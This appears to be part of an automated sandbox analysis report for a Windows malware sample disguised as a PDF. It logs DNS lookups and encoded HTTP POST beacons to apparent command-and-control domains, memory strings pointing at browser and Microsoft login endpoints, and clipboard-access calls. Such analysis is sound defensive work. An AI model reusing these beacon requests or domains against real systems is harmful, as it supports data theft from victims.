                    Source: global trafficHTTP traffic detected: GET /s8dp/?5lf8fv8H=rltVgnxG7skGUaMKpVhyEPF4v5Ox4an8JStNzNQrUbrzak/EOBCVCfZgcjG6plEiD8Vg4P/IIwGC19xvtxAv8Aa2yBIi9XmnoCp9ndMs1wSssRnKGiU00wY=&AjEdl=yJNdk0d HTTP/1.1Host: www.vpnto.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                    Source: global trafficDNS traffic detected: DNS query: www.tempatmudisini06.click
                    Source: global trafficDNS traffic detected: DNS query: www.carsten.studio
                    Source: global trafficDNS traffic detected: DNS query: www.moumore.top
                    Source: global trafficDNS traffic detected: DNS query: www.vpnto.net
                    Source: global trafficDNS traffic detected: DNS query: www.sitioseguro.blog
                    Source: unknownHTTP traffic detected: POST /bdk6/ HTTP/1.1Host: www.carsten.studioAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-usConnection: closeContent-Length: 205Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedOrigin: http://www.carsten.studioReferer: http://www.carsten.studio/bdk6/User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36Data Raw: 35 6c 66 38 66 76 38 48 3d 43 6f 43 68 53 4f 4e 30 4c 30 36 4a 5a 46 4b 42 70 61 6a 66 62 30 32 46 2f 50 2b 6b 54 6b 53 74 44 55 45 44 4a 33 51 61 44 6b 2f 47 54 50 32 6f 38 76 36 33 66 45 34 64 33 56 42 65 77 67 36 59 4c 54 77 36 36 52 44 44 54 38 76 78 78 72 6d 45 74 75 65 4e 5a 65 2f 50 6d 46 76 4c 66 50 52 34 33 38 63 67 46 79 77 78 36 69 70 4d 50 38 50 32 33 63 71 4e 34 70 75 4e 46 50 78 31 42 65 34 48 55 70 70 73 70 68 36 61 57 70 71 4a 33 53 4a 41 36 72 4b 51 61 4e 51 66 69 6e 5a 63 57 4c 54 30 70 54 68 2b 47 59 31 31 4c 5a 51 42 34 59 4b 69 4d 49 70 58 47 6a 32 2b 63 6b 61 59 62 69 63 71 4f 51 3d 3d Data Ascii: 5lf8fv8H=CoChSON0L06JZFKBpajfb02F/P+kTkStDUEDJ3QaDk/GTP2o8v63fE4d3VBewg6YLTw66RDDT8vxxrmEtueNZe/PmFvLfPR438cgFywx6ipMP8P23cqN4puNFPx1Be4HUppsph6aWpqJ3SJA6rKQaNQfinZcWLT0pTh+GY11LZQB4YKiMIpXGj2+ckaYbicqOQ==
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 19 Nov 2024 02:56:17 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 02:56:48 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 02:56:50 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 02:56:53 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 02:56:55 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
                    Source: XzXxPWzavnqD.exe, 0000000B.00000002.3083758728.0000000002AF6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sitioseguro.blog
                    Source: XzXxPWzavnqD.exe, 0000000B.00000002.3083758728.0000000002AF6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sitioseguro.blog/6o0x/
                    Source: upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: upnpcont.exe, 0000000A.00000002.3085844190.00000000039E8000.00000004.10000000.00040000.00000000.sdmp, XzXxPWzavnqD.exe, 0000000B.00000002.3084807693.0000000003788000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                    Source: upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: upnpcont.exe, 0000000A.00000002.3083101418.000000000287E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: upnpcont.exe, 0000000A.00000002.3083101418.00000000028A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                    Source: upnpcont.exe, 0000000A.00000002.3083101418.000000000287E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: upnpcont.exe, 0000000A.00000002.3083101418.000000000287E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033YR
                    Source: upnpcont.exe, 0000000A.00000002.3083101418.000000000287E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: upnpcont.exe, 0000000A.00000002.3083101418.000000000287E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                    Source: upnpcont.exe, 0000000A.00000003.2510019101.0000000007745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                    Source: upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: XzXxPWzavnqD.exe, 0000000B.00000002.3084807693.00000000035F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.strato.de
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00396B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00396B0C
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00396D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00396D07
